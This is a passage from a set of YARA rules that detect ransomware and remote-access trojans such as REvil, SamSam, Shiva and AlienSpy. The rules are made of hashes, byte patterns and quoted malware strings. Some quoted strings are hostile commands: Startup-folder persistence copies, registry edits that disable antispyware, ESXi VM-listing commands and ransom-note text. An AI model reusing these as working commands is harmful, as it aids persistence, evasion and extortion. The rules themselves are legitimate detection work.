    $s13 = "operator co_await" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 716800) and all of them
}

rule Revil_Ransomware : ransomware {
  meta:
    author = "Josh Lemon"
    description = "Detects REvil Linux - Revix 1.1 and 1.2"
    reference = "https://angle.ankura.com/post/102hcny/revix-linux-ransomware"
    date = "2021-11-04"
    version = "1.1"
    hash1 = "f864922f947a6bb7d894245b53795b54b9378c0f7633c521240488e86f60c2c5"
    hash2 = "559e9c0a2ef6898fabaf0a5fb10ac4a0f8d721edde4758351910200fe16b5fa7"
    hash3 = "ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4"
  strings:
    $s1 = "Usage example: elf.exe --path /vmfs/ --threads 5" ascii fullword
    $s2 = "uname -a && echo \" | \" && hostname" ascii fullword
    $s3 = "esxcli --formatter=csv --format-param=fields==\"WorldID,DisplayName\" vm process list" ascii
    $s4 = "awk -F \"\\\"*,\\\"*\" '{system(\"esxcli" ascii
    $s5 = "--silent (-s) use for not stoping VMs mode" ascii fullword
    $s6 = "!!!BY DEFAULT THIS SOFTWARE USES 50 THREADS!!!" ascii fullword
    $s7 = "%d:%d: Comment not allowed here" ascii fullword
    $s8 = "Error decoding user_id %d " ascii fullword
    $s9 = "Error read urandm line %d!" ascii fullword
    $s10 = "%d:%d: Unexpected `%c` in comment opening sequence" ascii fullword
    $s11 = "%d:%d: Unexpected EOF in block comment" ascii fullword
    $s12 = "Using silent mode, if you on esxi - stop VMs manualy" ascii fullword
    $s13 = "rand: try to read %hu but get %lu bytes" ascii fullword
    $s14 = "Revix" ascii fullword
    $s15 = "without --path encrypts current dir" ascii fullword
    $e1 = "[%s] already encrypted" ascii fullword
    $e2 = "File [%s] was encrypted" ascii fullword
    $e3 = "File [%s] was NOT encrypted" ascii fullword
    $e4 = "Encrypting [%s]" ascii fullword
  condition:
    uint16(0) == 17791 and filesize < 307200 and (4 of ($s*) and 2 of ($e*))
}

rule SAmSAmRansom2016 {
  meta:
    author = "Christiaan Beek"
    date = "2018-01-25"
    hash1 = "45e00fe90c8aa8578fce2b305840e368d62578c77e352974da6b8f8bc895d75b"
    hash2 = "946dd4c4f3c78e7e4819a712c7fd6497722a3d616d33e3306a556a9dc99656f4"
    hash3 = "979692a34201f9fc1e1c44654dc8074a82000946deedfdf6b8985827da992868"
    hash4 = "939efdc272e8636fd63c1b58c2eec94cf10299cd2de30c329bd5378b6bbbd1c8"
    hash5 = "a763ed678a52f77a7b75d55010124a8fccf1628eb4f7a815c6d635034227177e"
    hash6 = "e682ac6b874e0a6cfc5ff88798315b2cb822d165a7e6f72a5eb74e6da451e155"
    hash7 = "6bc2aa391b8ef260e79b99409e44011874630c2631e4487e82b76e5cb0a49307"
    hash8 = "036071786d7db553e2415ec2e71f3967baf51bdc31d0a640aa4afb87d3ce3050"
    hash9 = "ffef0f1c2df157e9c2ee65a12d5b7b0f1301c4da22e7e7f3eac6b03c6487a626"
    hash10 = "89b4abb78970cd524dd887053d5bcd982534558efdf25c83f96e13b56b4ee805"
    hash11 = "7aa585e6fd0a895c295c4bea2ddb071eed1e5775f437602b577a54eef7f61044"
    hash12 = "0f2c5c39494f15b7ee637ad5b6b5d00a3e2f407b4f27d140cd5a821ff08acfac"
    hash13 = "58ef87523184d5df3ed1568397cea65b3f44df06c73eadeb5d90faebe4390e3e"
  strings:
    $x1 = "Could not list processes locking resource. Failed to get size of result." wide fullword
    $s2 = "Could not list processes locking resource." wide fullword
    $s3 = "samsam.del.exe" ascii fullword
    $s4 = "samsam.exe" wide fullword
    $s5 = "RM_UNIQUE_PROCESS" ascii fullword
    $s6 = "KillProcessWithWait" ascii fullword
    $s7 = "killOpenedProcessTree" ascii fullword
    $s8 = "RM_PROCESS_INFO" ascii fullword
    $s9 = "Exception caught in process: {0}" wide fullword
    $s10 = "Could not begin restart session.  Unable to determine file locker." wide fullword
    $s11 = "samsam.Properties.Resources.resources" ascii fullword
    $s12 = "EncryptStringToBytes" ascii fullword
    $s13 = "recursivegetfiles" ascii fullword
    $s14 = "RSAEncryptBytes" ascii fullword
    $s15 = "encryptFile" ascii fullword
    $s16 = "samsam.Properties.Resources" wide fullword
    $s17 = "TSSessionId" ascii fullword
    $s18 = "Could not register resource." wide fullword
    $s19 = "<recursivegetfiles>b__0" ascii fullword
    $s20 = "create_from_resource" ascii fullword
    $op0 = { 96 00 E0 00 29 00 0B 00 34 23 }
    $op1 = { 96 00 12 04 F9 00 34 00 6C 2C }
    $op2 = { 72 A5 0A 00 70 A2 06 20 94 }
  condition:
    (uint16(0) == 23117 and filesize < 716800 and pe.imphash() == "f34d5f2d4577ed6d9ceec516c1f5a744" and (1 of ($x*) and 4 of them) and all of ($op*)) or (all of them)
}

rule SamSam_Ransomware_Latest {
  meta:
    description = "Latest SamSA ransomware samples"
    author = "Christiaan Beek"
    reference = "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html"
    date = "2018-01-23"
    hash1 = "e7bebd1b1419f42293732c70095f35c8310fa3afee55f1df68d4fe6bbee5397e"
    hash2 = "72832db9b951663b8f322778440b8720ea95cde0349a1d26477edd95b3915479"
    hash3 = "3531bb1077c64840b9c95c45d382448abffa4f386ad88e125c96a38166832252"
    hash4 = "88d24b497cfeb47ec6719752f2af00c802c38e7d4b5d526311d552c6d5f4ad34"
    hash5 = "8eabfa74d88e439cfca9ccabd0ee34422892d8e58331a63bea94a7c4140cf7ab"
    hash6 = "88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828"
  strings:
    $s1 = "bedf08175d319a2f879fe720032d11e5" wide fullword
    $s2 = "ksdghksdghkddgdfgdfgfd" ascii fullword
    $s3 = "osieyrgvbsgnhkflkstesadfakdhaksjfgyjqqwgjrwgehjgfdjgdffg" ascii fullword
    $s4 = "5c2d376c976669efaf9cb107f5a83d0c" wide fullword
    $s5 = "B917754BCFE717EB4F7CE04A5B11A6351EEC5015" ascii fullword
    $s6 = "f99e47c1d4ccb2b103f5f730f8eb598a" wide fullword
    $s7 = "d2db284217a6e5596913e2e1a5b2672f" wide fullword
    $s8 = "0bddb8acd38f6da118f47243af48d8af" wide fullword
    $s9 = "f73623dcb4f62b0e5b9b4d83e1ee4323" wide fullword
    $s10 = "916ab48e32e904b8e1b87b7e3ced6d55" wide fullword
    $s11 = "c6e61622dc51e17195e4df6e359218a2" wide fullword
    $s12 = "2a9e8d549af13031f6bf7807242ce27f" wide fullword
    $s13 = "e3208957ad76d2f2e249276410744b29" wide fullword
    $s14 = "b4d28bbd65da97431f494dd7741bee70" wide fullword
    $s15 = "81ee346489c272f456f2b17d96365c34" wide fullword
    $s16 = "94682debc6f156b7e90e0d6dc772734d" wide fullword
    $s17 = "6943e17a989f11af750ea0441a713b89" wide fullword
    $s18 = "b1c7e24b315ff9c73a9a89afac5286be" wide fullword
    $s19 = "90928fd1250435589cc0150849bc0cff" wide fullword
    $s20 = "67da807268764a7badc4904df351932e" wide fullword
    $op0 = { 30 01 00 2B 68 79 33 38 68 34 77 65 36 34 74 72 }
    $op1 = { 01 00 B2 04 00 00 01 00 84 }
    $op2 = { 68 09 00 00 38 66 00 00 23 55 53 00 A0 6F 00 00 }
  condition:
    (uint16(0) == 23117 and filesize < 102400 and pe.imphash() == "f34d5f2d4577ed6d9ceec516c1f5a744" and (8 of them) and all of ($op*)) or (all of them)
}

rule Ransom_Satana {
  meta:
    description = "Regla para detectar Ransom.Satana"
    author = "CCN-CERT"
    version = "1.0"
  strings:
    $a = { 21 00 73 00 61 00 74 00 61 00 6E 00 61 00 21 00 2E 00 74 00 78 00 74 00 00 }
    $b = { 74 67 77 79 75 67 77 71 }
    $c = { 53 77 76 77 6E 67 75 }
    $d = { 45 6E 75 6D 4C 6F 63 61 6C 52 65 73 }
    $e = { 57 4E 65 74 4F 70 65 6E 45 6E 75 6D 57 00 }
    $f = { 21 53 41 54 41 4E 41 21 }
  condition:
    $b or $c and $d and $a and $e and $f
}

rule Ransom_Satana_Dropper {
  meta:
    description = "Regla para detectar el dropper de Ransom.Satana"
    author = "CCN-CERT"
    version = "1.0"
  strings:
    $a = { 25 73 2D 54 72 79 45 78 63 65 70 74 }
    $b = { 64 3A 5C 6C 62 65 74 77 6D 77 79 5C 75 69 6A 65 75 71 70 6C 66 77 75 62 2E 70 64 62 }
    $c = { 71 66 6E 74 76 74 68 62 }
  condition:
    all of them
}

rule unpacked_shiva_ransomware {
  meta:
    description = "Rule to detect an unpacked sample of Shiva ransopmw"
    author = "Marc Rivero | @seifreed"
    reference = "https://twitter.com/malwrhunterteam/status/1037424962569732096"
  strings:
    $s1 = "c:\\Users\\sys\\Desktop\\v 0.5\\Shiva\\Shiva\\obj\\Debug\\shiva.pdb" ascii fullword
    $s2 = "This email will be as confirmation you are ready to pay for decryption key." wide fullword
    $s3 = "Your important files are now encrypted due to a security problem with your PC!" wide fullword
    $s4 = "write.php?info=" wide fullword
    $s5 = " * Do not try to decrypt your data using third party software, it may cause permanent data loss." wide fullword
    $s6 = " * Do not rename encrypted files." wide fullword
    $s7 = ".compositiontemplate" wide fullword
    $s8 = "You have to pay for decryption in Bitcoins. The price depends on how fast you write to us." wide fullword
    $s9 = "\\READ_IT.txt" wide fullword
    $s10 = ".lastlogin" wide fullword
    $s11 = ".logonxp" wide fullword
    $s12 = " * Decryption of your files with the help of third parties may cause increased price" wide fullword
    $s13 = "After payment we will send you the decryption tool that will decrypt all your files." wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 819200) and all of them
}

rule sigma_ransomware {
  meta:
    author = "J from THL <j@techhelplist.com>"
    date = "20180509"
    reference1 = "https://www.virustotal.com/#/file/705ad78bf5503e6022f08da4c347afb47d4e740cfe6c39c08550c740c3be96ba"
    reference2 = "https://www.virustotal.com/#/file/bb3533440c27a115878ae541aba3bda02d441f3ea1864b868862255aabb0c8ff"
    version = 1
    maltype = "Ransomware"
    filetype = "memory"
  strings:
    $a = ".php?"
    $b = "uid="
    $c = "&uname="
    $d = "&os="
    $e = "&pcname="
    $f = "&total="
    $g = "&country="
    $h = "&network="
    $i = "&subid="
  condition:
    all of them
}

rule SnakeRansomware {
  meta:
    Author = "Nishan Maharjan"
    Description = "A yara rule to catch snake ransomware"
    Reference = "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017"
    Data = "15th May 2020"
  strings:
    $go_build_id = "Go build ID: \"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz\""
    $math_rand_seed_calling = { 89 C8 BB 00 CA 9A 3B 89 D1 F7 E3 81 E1 FF FF FF 3F 89 C3 01 C8 89 C6 05 00 00 1A 3D 89 04 24 69 ED 00 CA 9A 3B 01 EA 89 CD C1 F9 1F 01 EB 11 CA 81 C6 00 00 1A 3D 81 D2 EB 03 B2 A1 89 54 24 04 E8 10 62 F6 FF }
    $encryption_function = { 64 8B 0D 14 00 00 00 8B 89 00 00 00 00 3B 61 08 0F 86 38 01 00 00 83 EC 3C E8 32 1A F3 FF 8D 7C 24 28 89 E6 E8 25 EA F0 FF 8B 44 24 2C 8B 4C 24 28 89 C2 C1 E8 1F C1 E0 1F 85 C0 0F 84 FC 00 00 00 D1 E2 89 CB C1 E9 1F 09 D1 89 DA D1 E3 C1 EB 1F 89 CD D1 E1 09 D9 89 CB 81 C1 80 7F B1 D7 C1 ED 1F 81 C3 80 7F B1 D7 83 D5 0D 89 C8 BB 00 CA 9A 3B 89 D1 F7 E3 81 E1 FF FF FF 3F 89 C3 01 C8 89 C6 05 00 00 1A 3D 89 04 24 69 ED 00 CA 9A 3B 01 EA 89 CD C1 F9 1F 01 EB 11 CA 81 C6 00 00 1A 3D 81 D2 EB 03 B2 A1 89 54 24 04 E8 10 62 F6 FF 31 C0 EB 79 89 44 24 20 8B 4C 24 40 8D 14 C1 8B 1A 89 5C 24 24 8B 52 04 89 54 24 1C C7 04 24 05 00 00 00 E8 48 FE FF FF 8B 44 24 08 8B 4C 24 04 C7 04 24 00 00 00 00 8B 54 24 24 89 54 24 04 8B 5C 24 1C 89 5C 24 08 89 4C 24 0C 89 44 24 10 E8 EC DD EF FF 8B 44 24 18 8B 4C 24 14 89 4C 24 08 89 44 24 0C 8B 44 24 24 89 04 24 8B 44 24 1C 89 44 24 04 E8 68 BB F3 FF 8B 44 24 20 40 }
  condition:
    all of them
}

rule stampado_overlay {
  meta:
    description = "Catches Stampado samples looking for \\r at the beginning of PE overlay section"
    reference = ""
    author = "Fernando Merces, FTR, Trend Micro"
    date = "2016-07"
    md5 = "a393b9536a1caa34914636d3da7378b5"
    md5 = "dbf3707a9cd090853a11dda9cfa78ff0"
    md5 = "dd5686ca7ec28815c3cf3ed3dbebdff2"
    md5 = "6337f0938e4a9c0ef44ab99deb0ef466"
  condition:
    pe.characteristics == 290 and pe.number_of_sections == 5 and pe.imports("VERSION.dll", "VerQueryValueW") and uint8(pe.sections[4].raw_data_offset + pe.sections[4].raw_data_size) == 13
}

rule TeslaCrypt {
  meta:
    description = "Regla para detectar Tesla con md5"
    author = "CCN-CERT"
    version = "1.0"
  strings:
    $ = { 4E 6F 77 20 69 74 27 73 20 25 49 3A 25 4D 25 70 2E 00 00 00 76 61 6C 20 69 73 20 25 64 0A 00 00 }
  condition:
    all of them
}

rule Win32Toxic : tox ransomware {
  meta:
    author = "@GelosSnake"
    date = "2015-06-02"
    description = "https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us"
    hash0 = "70624c13be4d8a4c1361be38b49cb3eb"
    hash1 = "4f20d25cd3ae2e5c63d451d095d97046"
    hash2 = "e0473434cc83b57c4b579d585d4c4c57"
    hash3 = "c52090d184b63e5cc71b524153bb079e"
    hash4 = "7ac0b49baba9914b234cde62058c96a5"
    hash5 = "048c007de4902b6f4731fde45fa8e6a9"
    hash6 = "238ef3e35b14e304c87b9c62f18953a9"
    hash7 = "8908ccd681f66429c578a889e6e708e1"
    hash8 = "de9fe2b7d9463982cc77c78ee51e4d51"
    hash9 = "37add8d26a35a3dc9700b92b67625fa4"
    hash10 = "a0f30e89a3431fca1d389f90dba1d56e"
    hash11 = "d4d0658302c731003bf0683127618bd9"
    hash12 = "d1d89e1c7066f41c1d30985ac7b569db"
    hash13 = "97d52d7281dfae8ff9e704bf30ce2484"
    hash14 = "2cc85be01e86e0505697cf61219e66da"
    hash15 = "02ecfb44b9b11b846ea8233d524ecda3"
    hash16 = "703a6ebe71131671df6bc92086c9a641"
    hash17 = "df23629b4a4aed05d6a453280256c05a"
    hash18 = "07466ff2572f16c63e1fee206b081d11"
    hash19 = "792a1c0971775d32bad374b288792468"
    hash20 = "fb7fd5623fa6b7791a221fad463223cd"
    hash21 = "83a562aab1d66e5d170f091b2ae6a213"
    hash22 = "99214c8c9ff4653b533dc1b19a21d389"
    hash23 = "a92aec198eee23a3a9a145e64d0250ee"
    hash24 = "e0f7e6b96ca72b9755965b9dac3ce77e"
    hash25 = "f520fc947a6d5edb87aa01510bee9c8d"
    hash26 = "6d7babbe5e438539a9fa2c5d6128d3b4"
    hash27 = "3133c2231fcee5d6b0b4c988a5201da1"
    hash28 = "e5b1d198edc413376e0c0091566198e4"
    hash29 = "50515b5a6e717976823895465d5dc684"
    hash30 = "510389e8c7f22f2076fc7c5388e01220"
    hash31 = "60573c945aa3b8cfaca0bdb6dd7d2019"
    hash32 = "394187056697463eba97382018dfe151"
    hash33 = "045a5d3c95e28629927c72cf3313f4cd"
    hash34 = "70951624eb06f7db0dcab5fc33f49127"
    hash35 = "5def9e3f7b15b2a75c80596b5e24e0f4"
    hash36 = "35a42fb1c65ebd7d763db4abb26d33b0"
    hash37 = "b0030f5072864572f8e6ba9b295615fc"
    hash38 = "62706f48689f1ba3d1d79780010b8739"
    hash39 = "be86183fa029629ee9c07310cd630871"
    hash40 = "9755c3920d3a38eb1b5b7edbce6d4914"
    hash41 = "cb42611b4bed97d152721e8db5abd860"
    hash42 = "5475344d69fc6778e12dc1cbba23b382"
    hash43 = "8c1bf70742b62dec1b350a4e5046c7b6"
    hash44 = "6a6541c0f63f45eff725dec951ec90a7"
    hash45 = "a592c5bee0d81ee127cbfbcb4178afe8"
    hash46 = "b74c6d86ec3904f4d73d05b2797f1cc3"
    hash47 = "28d76fd4dd2dbfc61b0c99d2ad08cd8e"
    hash48 = "fc859ae67dc1596ac3fdd79b2ed02910"
    hash49 = "cb65d5e929da8ff5c8434fd8d36e5dfb"
    hash50 = "888dd1acce29cd37f0696a0284ab740a"
    hash51 = "0e3e231c255a5eefefd20d70c247d5f0"
    hash52 = "e5ebe35d934106f9f4cebbd84e04534b"
    hash53 = "3b580f1fa0c961a83920ce32b4e4e86d"
    hash54 = "d807a704f78121250227793ea15aa9c4"
    hash55 = "db462159bddc0953444afd7b0d57e783"
    hash56 = "2ed4945fb9e6202c10fad0761723cb0e"
    hash57 = "51183ab4fd2304a278e36d36b5fb990c"
    hash58 = "65d602313c585c8712ea0560a655ddeb"
    hash59 = "0128c12d4a72d14bb67e459b3700a373"
    hash60 = "5d3dfc161c983f8e820e59c370f65581"
    hash61 = "d4dd475179cd9f6180d5b931e8740ed6"
    hash62 = "5dd3782ce5f94686448326ddbbac934c"
    hash63 = "c85c6171a7ff05d66d497ad0d73a51ed"
    hash64 = "b42dda2100da688243fe85a819d61e2e"
    hash65 = "a5cf8f2b7d97d86f4d8948360f3db714"
    hash66 = "293cae15e4db1217ea72581836a6642c"
    hash67 = "56c3a5bae3cb1d0d315c1353ae67cf58"
    hash68 = "c86dc1d0378cc0b579a11d873ac944e7"
    hash69 = "54cef0185798f3ec1f4cb95fad4ddd7c"
    hash70 = "eb2eff9838043b67e8024ccadcfe1a8f"
    hash71 = "78778fe62ee28ef949eec2e7e5961ca8"
    hash72 = "e75c5762471a490d49b79d01da745498"
    hash73 = "1564d3e27b90a166a0989a61dc3bd646"
    hash74 = "59ba111403842c1f260f886d69e8757d"
    hash75 = "d840dfbe52a04665e40807c9d960cccc"
    hash76 = "77f543f4a8f54ecf84b15da8e928d3f9"
    hash77 = "bd9512679fdc1e1e89a24f6ebe0d5ad8"
    hash78 = "202f042d02be4f6469ed6f2e71f42c04"
    hash79 = "28f827673833175dd9094002f2f9b780"
    hash80 = "0ff10287b4c50e0d11ab998a28529415"
    hash81 = "644daa2b294c5583ce6aa8bc68f1d21f"
    hash82 = "1c9db47778a41775bbcb70256cc1a035"
    hash83 = "c203bc5752e5319b81cf1ca970c3ca96"
    hash84 = "656f2571e4f5172182fc970a5b21c0e7"
    hash85 = "c17122a9864e3bbf622285c4d5503282"
    hash86 = "f9e3a9636b45edbcef2ee28bd6b1cfbb"
    hash87 = "291ff8b46d417691a83c73a9d3a30cc9"
    hash88 = "1217877d3f7824165bb28281ccc80182"
    hash89 = "18419d775652f47a657c5400d4aef4a3"
    hash90 = "04417923bf4f2be48dd567dfd33684e2"
    hash91 = "31efe902ec6a5ab9e6876cfe715d7c84"
    hash92 = "a2e4472c5097d7433b91d65579711664"
    hash93 = "98854d7aba1874c39636ff3b703a1ed1"
    hash94 = "5149f0e0a56b33e7bbed1457aab8763f"
    hash95 = "7a4338193ce12529d6ae5cfcbb1019af"
    hash96 = "aa7f37206aba3cbe5e11d336424c549a"
    hash97 = "51cad5d45cdbc2940a66d044d5a8dabf"
    hash98 = "85edb7b8dee5b60e3ce32e1286207faa"
    hash99 = "34ca5292ae56fea78ba14abe8fe11f06"
    hash100 = "154187f07621a9213d77a18c0758960f"
    hash101 = "4e633f0478b993551db22afddfa22262"
    hash102 = "5c50e4427fe178566cada96b2afbc2d4"
    hash103 = "263001ac21ef78c31f4ca7ad2e7f191d"
    hash104 = "53fd9e7500e3522065a2dabb932d9dc5"
    hash105 = "48043dc55718eb9e5b134dac93ebb5f6"
    hash106 = "ca19a1b85363cfed4d36e3e7b990c8b6"
    hash107 = "41b5403a5443a3a84f0007131173c126"
    hash108 = "6f3833bc6e5940155aa804e58500da81"
    hash109 = "9bd50fcfa7ca6e171516101673c4e795"
    hash110 = "6d52ba0d48d5bf3242cd11488c75b9a7"
    hash111 = "c52afb663ff4165e407f53a82e34e1d5"
    hash112 = "5a16396d418355731c6d7bb7b21e05f7"
    hash113 = "05559db924e71cccee87d21b968d0930"
    hash114 = "824312bf8e8e7714616ba62997467fa8"
    hash115 = "dfec435e6264a0bfe47fc5239631903c"
    hash116 = "3512e7da9d66ca62be3418bead2fb091"
    hash117 = "7ad4df88db6f292e7ddeec7cf63fa2bc"
    hash118 = "d512da73d0ca103df3c9e7c074babc99"
    hash119 = "c622b844388c16278d1bc768dcfbbeab"
    hash120 = "170ffa1cd19a1cecc6dae5bdd10efb58"
    hash121 = "3a19c91c1c0baa7dd4a9def2e0b7c3e9"
    hash122 = "3b7ce3ceb8d2b85ab822f355904d47ce"
    hash123 = "a7bac2ace1f04a7ad440bd2f5f811edc"
    hash124 = "66594a62d8c98e1387ec8deb3fe39431"
    hash125 = "a1add9e5d7646584fd4140528d02e4c3"
    hash126 = "11328bbf5a76535e53ab35315321f904"
    hash127 = "048f19d79c953e523675e96fb6e417a9"
    hash128 = "eb65fc2922eafd62defd978a3215814b"
    hash129 = "51cc9987f86a76d75bf335a8864ec250"
    hash130 = "a7f91301712b5a3cc8c3ab9c119530ce"
    hash131 = "de976a5b3d603161a737e7b947fdbb9a"
    hash132 = "288a3659cc1aec47530752b3a31c232b"
    hash133 = "91da679f417040558059ccd5b1063688"
    hash134 = "4ce9a0877b5c6f439f3e90f52eb85398"
    hash135 = "1f9e097ff9724d4384c09748a71ef99d"
    hash136 = "7d8a64a94e71a5c24ad82e8a58f4b7e6"
    hash137 = "db119e3c6b57d9c6b739b0f9cbaeb6fd"
    hash138 = "52c9d25179bf010a4bb20d5b5b4e0615"
    hash139 = "4b9995578d51fb891040a7f159613a99"
    sample_filetype = "exe"
    yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
  strings:
    $string0 = "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<"
    $string1 = "t;<<t;<<t<<<t<<"
    $string2 = ">>><<<"
  condition:
    2 of them
}

rule screenlocker_acroware {
  meta:
    description = "Rule to detect Acroware ScreenLocker"
    author = "Marc Rivero | @seifreed"
    reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
  strings:
    $s1 = "C:\\Users\\patri\\Documents\\Visual Studio 2015\\Projects\\Advanced Ransi\\Advanced Ransi\\obj\\Debug\\Advanced Ransi.pdb" ascii fullword
    $s2 = "All your Personal Data got encrypted and the decryption key is stored on a hidden" ascii fullword
    $s3 = "alphaoil@mail2tor.com any try of removing this Ransomware will result in an instantly " ascii fullword
    $s4 = "HKEY_CURRENT_USER\\SoftwareE\\Microsoft\\Windows\\CurrentVersion\\Run" wide fullword
    $s5 = "webserver, after 72 hours the decryption key will get removed and your personal" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000) and all of them
}

rule jeff_dev_ransomware {
  meta:
    description = "Rule to detect Jeff DEV Ransomware"
    author = "Marc Rivero | @seifreed"
    reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
  strings:
    $s1 = "C:\\Users\\Umut\\Desktop\\takemeon" wide fullword
    $s2 = "C:\\Users\\Umut\\Desktop\\" ascii fullword
    $s3 = "PRESS HERE TO STOP THIS CREEPY SOUND AND VIEW WHAT HAPPENED TO YOUR COMPUTER" wide fullword
    $s4 = "WHAT YOU DO TO MY COMPUTER??!??!!!" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 5120000) and all of them
}

rule locdoor_ransomware {
  meta:
    description = "Rule to detect Locdoor/DryCry"
    author = "Marc Rivero | @seifreed"
    reference = "https://twitter.com/leotpsc/status/1036180615744376832"
  strings:
    $s1 = "copy \"Locdoor.exe\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\temp00000000.exe\"" ascii fullword
    $s2 = "copy wscript.vbs C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wscript.vbs" ascii fullword
    $s3 = "!! Your computer's important files have been encrypted! Your computer's important files have been encrypted!" ascii fullword
    $s4 = "echo CreateObject(\"SAPI.SpVoice\").Speak \"Your computer's important files have been encrypted! " ascii fullword
    $s5 = "! Your computer's important files have been encrypted! " ascii fullword
    $s7 = "This program is not supported on your operating system." ascii fullword
    $s8 = "echo Your computer's files have been encrypted to Locdoor Ransomware! To make a recovery go to localbitcoins.com and create a wa" ascii
    $s9 = "Please enter the password." ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 614400) and all of them
}

rule screenlocker_5h311_1nj3c706 {
  meta:
    description = "Rule to detect the screenlocker 5h311_1nj3c706"
    author = "Marc Rivero | @seifreed"
    reference = "https://twitter.com/demonslay335/status/1038060120461266944"
  strings:
    $s1 = "C:\\Users\\Hoang Nam\\source\\repos\\WindowsApp22\\WindowsApp22\\obj\\Debug\\WindowsApp22.pdb" ascii fullword
    $s2 = "cmd.exe /cREG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\ActiveDesktop /v NoChangingWallPaper /t REG_DWOR" wide
    $s3 = "C:\\Users\\file1.txt" wide fullword
    $s4 = "C:\\Users\\file2.txt" wide fullword
    $s5 = "C:\\Users\\file.txt" wide fullword
    $s6 = " /v Wallpaper /t REG_SZ /d %temp%\\IMG.jpg /f" wide fullword
    $s7 = " /v DisableAntiSpyware /t REG_DWORD /d 1 /f" wide fullword
    $s8 = "All your file has been locked. You must pay money to have a key." wide fullword
    $s9 = "After we receive Bitcoin from you. We will send key to your email." wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800) and all of them
}

rule shrug2_ransomware {
  meta:
    description = "Rule to detect Shrug2 ransomware"
    author = "Marc Rivero | @seifreed"
    reference = "https://blogs.quickheal.com/new-net-ransomware-shrug2/"
  strings:
    $s1 = "C:\\Users\\Gamer\\Desktop\\Shrug2\\ShrugTwo\\ShrugTwo\\obj\\Debug\\ShrugTwo.pdb" ascii fullword
    $s2 = "http://tempacc11vl.000webhostapp.com/" wide fullword
    $s4 = "Shortcut for @ShrugDecryptor@.exe" wide fullword
    $s5 = "C:\\Users\\" wide fullword
    $s6 = "http://clients3.google.com/generate_204" wide fullword
    $s7 = "\\Desktop\\@ShrugDecryptor@.lnk" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000) and all of them
}

rule termite_ransomware {
  meta:
    description = "Rule to detect Termite Ransomware"
    author = "Marc Rivero | @seifreed"
    reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
  strings:
    $s1 = "C:\\Windows\\SysNative\\mswsock.dll" ascii fullword
    $s2 = "C:\\Windows\\SysWOW64\\mswsock.dll" ascii fullword
    $s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Termite.exe" ascii fullword
    $s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Payment.exe" ascii fullword
    $s5 = "C:\\Windows\\Termite.exe" ascii fullword
    $s6 = "\\Shell\\Open\\Command\\" ascii fullword
    $s7 = "t314.520@qq.com" ascii fullword
    $s8 = "(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 6144000) and all of them
}

rule Adwind_JAR_PACKA : binary RAT Frutas Unrecom AlienSpy {
  meta:
    author = "Vitaly Kamluk, Vitaly.Kamluk@kaspersky.com"
    reference = "https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf"
    last_modified = "2015-11-30"
  strings:
    $b1 = ".class" ascii
    $b2 = "c/a/a/" ascii
    $b3 = "b/a/" ascii
    $b4 = "a.dat" ascii
    $b5 = "META-INF/MANIFEST.MF" ascii
  condition:
    int16(0) == 19280 and ($b1 and $b2 and $b3 and $b4 and $b5)
}

rule Adwind_JAR_PACKB : binary RAT Frutas Unrecom AlienSpy {
  meta:
    author = "Vitaly Kamluk, Vitaly.Kamluk@kaspersky.com"
    reference = "https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf"
    last_modified = "2015-11-30"
  strings:
    $c1 = "META-INF/MANIFEST.MF" ascii
    $c2 = "main/Start.class" ascii
    $a1 = "con g/con g.perl" ascii
    $b1 = "java/textito.isn" ascii
  condition:
    int16(0) == 19280 and ($c1 and $c2 and ($a1 or $b1))
}

rule crime_win_rat_AlienSpy : binary RAT Frutas Unrecom AlienSpy {
  meta:
    description = "Alien Spy Remote Access Trojan"
    author = "General Dynamics Fidelis Cybersecurity Solutions - Threat Research Team"
    reference_1 = "www.fidelissecurity.com/sites/default/files/FTA_1015_Alienspy_FINAL.pdf"
    reference_2 = "www.fidelissecurity.com/sites/default/files/AlienSpy-Configs2_1_2.csv"
    date = "2015-04-04"
    filetype = "Java"
    hash_1 = "075fa0567d3415fbab3514b8aa64cfcb"
    hash_2 = "818afea3040a887f191ee9d0579ac6ed"
    hash_3 = "973de705f2f01e82c00db92eaa27912c"
    hash_4 = "7f838907f9cc8305544bd0ad4cfd278e"
    hash_5 = "071e12454731161d47a12a8c4b3adfea"
    hash_6 = "a7d50760d49faff3656903c1130fd20b"
    hash_7 = "f399afb901fcdf436a1b2a135da3ee39"
    hash_8 = "3698a3630f80a632c0c7c12e929184fb"
    hash_9 = "fdb674cadfa038ff9d931e376f89f1b6"
  strings:
